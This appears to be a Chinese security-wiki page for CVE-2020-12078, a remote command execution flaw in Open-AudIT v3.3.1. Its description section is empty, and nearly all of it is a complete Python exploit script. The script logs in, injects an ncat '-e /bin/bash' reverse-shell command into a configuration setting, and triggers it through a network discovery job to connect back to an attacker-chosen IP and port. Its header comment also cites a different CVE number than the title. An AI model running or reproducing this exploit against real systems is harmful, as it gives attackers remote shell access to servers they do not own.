menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right yougar0.github.io(基于零组公开漏洞库 + PeiQi文库的一些漏洞)-20210715 chevron_right Web安全 chevron_right Open-AudIT chevron_right (CVE-2020-12078)Open-AudIT v3.3.1 远程命令执行漏洞.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    (CVE-2020-12078)Open-AudIT v3.3.1 远程命令执行漏洞.md
    5.31 KB / 2021-04-21 09:23:46
        (CVE-2020-12078)Open-AudIT v3.3.1 远程命令执行漏洞
    ====================================================
    
    一、漏洞简介
    ------------
    
    二、漏洞影响
    ------------
    
    Open-AudIT v3.3.1
    
    三、复现过程
    ------------
    
    ![](./resource/(CVE-2020-12078)Open-AudITv3.3.1远程命令执行漏洞/media/rId24.png)
    
        OpenAudIT-postauth-rce.py
        #!/usr/bin/python3
    
        # Exploit Title: Open-AudIT Professional v3.3.1 Remote Code Execution
        # Date: 22/04/2020
        # Exploit Author: Askar (@mohammadaskar2)
        # CVE: CVE-2020-8813
        # Vendor Homepage: https://opmantek.com/
        # Version: v3.3.1
        # Tested on: Ubuntu 18.04 / PHP 7.2.24
    
        import requests
        import sys
        import warnings
        import random
        import string
        from bs4 import BeautifulSoup
        from urllib.parse import quote
    
        warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
    
    
        if len(sys.argv) != 6:
            print("[~] Usage : ./openaudit-exploit.py url username password ip port")
            exit()
    
        url = sys.argv[1]
        username = sys.argv[2]
        password = sys.argv[3]
        ip = sys.argv[4]
        port = sys.argv[5]
    
        request = requests.session()
    
        def inject_payload():
            configuration_path = url+"/en/omk/open-audit/configuration/90"
            data = 'data={"data":{"id":"90","type":"configuration","attributes":{"value":";ncat${IFS}-e${IFS}/bin/bash${IFS}%s${IFS}%s${IFS};"}}}' % (ip, port)
            request.patch(configuration_path, data)
            print("[+] Payload injected in settings")
    
    
        def start_discovery():
            discovery_path = url+"/en/omk/open-audit/discoveries/create"
            post_discovery_path = url+"/en/omk/open-audit/discoveries"
            scan_name = "".join([random.choice(string.ascii_uppercase) for i in range(10)])
            req = request.get(discovery_path)
    
            response = req.text
            soup = BeautifulSoup(response, "html5lib")
            token = soup.findAll('input')[5].get("value")
            buttons = soup.findAll("button")
            headers = {"Referer" : discovery_path}
            request_data = {
            "data[attributes][name]":scan_name,
            "data[attributes][other][subnet]":"10.10.10.1/24",
            "data[attributes][other][ad_server]":"",
            "data[attributes][other][ad_domain]":"",
            "submit":"",
            "data[type]":"discoveries",
            "data[access_token]":token,
            "data[attributes][complete]":"y",
            "data[attributes][org_id]":"1",
            "data[attributes][type]":"subnet",
            "data[attributes][devices_assigned_to_org]":"",
            "data[attributes][devices_assigned_to_location]":"",
            "data[attributes][other][nmap][discovery_scan_option_id]":"1",
            "data[attributes][other][nmap][ping]":"y",
            "data[attributes][other][nmap][service_version]":"n",
            "data[attributes][other][nmap][open|filtered]":"n",
            "data[attributes][other][nmap][filtered]":"n",
            "data[attributes][other][nmap][timing]":"4",
            "data[attributes][other][nmap][nmap_tcp_ports]":"0",
            "data[attributes][other][nmap][nmap_udp_ports]":"0",
            "data[attributes][other][nmap][tcp_ports]":"22,135,62078",
            "data[attributes][other][nmap][udp_ports]":"161",
            "data[attributes][other][nmap][timeout]":"",
            "data[attributes][other][nmap][exclude_tcp_ports]":"",
            "data[attributes][other][nmap][exclude_udp_ports]":"",
            "data[attributes][other][nmap][exclude_ip]":"",
            "data[attributes][other][nmap][ssh_ports]":"22",
            "data[attributes][other][match][match_dbus]":"",
            "data[attributes][other][match][match_fqdn]":"",
            "data[attributes][other][match][match_dns_fqdn]":"",
            "data[attributes][other][match][match_dns_hostname]":"",
            "data[attributes][other][match][match_hostname]":"",
            "data[attributes][other][match][match_hostname_dbus]":"",
            "data[attributes][other][match][match_hostname_serial]":"",
            "data[attributes][other][match][match_hostname_uuid]":"",
            "data[attributes][other][match][match_ip]":"",
            "data[attributes][other][match][match_ip_no_data]":"",
            "data[attributes][other][match][match_mac]":"",
            "data[attributes][other][match][match_mac_vmware]":"",
            "data[attributes][other][match][match_serial]":"",
            "data[attributes][other][match][match_serial_type]":"",
            "data[attributes][other][match][match_sysname]":"",
            "data[attributes][other][match][match_sysname_serial]":"",
            "data[attributes][other][match][match_uuid]":""
    
            }
            print("[+] Creating discovery ..")
            req = request.post(post_discovery_path, data=request_data, headers=headers, allow_redirects=False)
            disocvery_url = url + req.headers['Location'] + "/execute"
            print("[+] Triggering payload ..")
            print("[+] Check your nc ;)")
            request.get(disocvery_url)
    
    
        def login():
            login_info = {
            "redirect_url": "/en/omk/open-audit",
            "username": username,
            "password": password
            }
            login_request = request.post(url+"/en/omk/open-audit/login", login_info)
            login_text = login_request.text
            if "There was an error authenticating" in login_text:
                return False
            else:
                return True
    
        if login():
            print("[+] LoggedIn Successfully")
            inject_payload()
            start_discovery()
        else:
            print("[-] Cannot login!")
    
    
    links
    file_download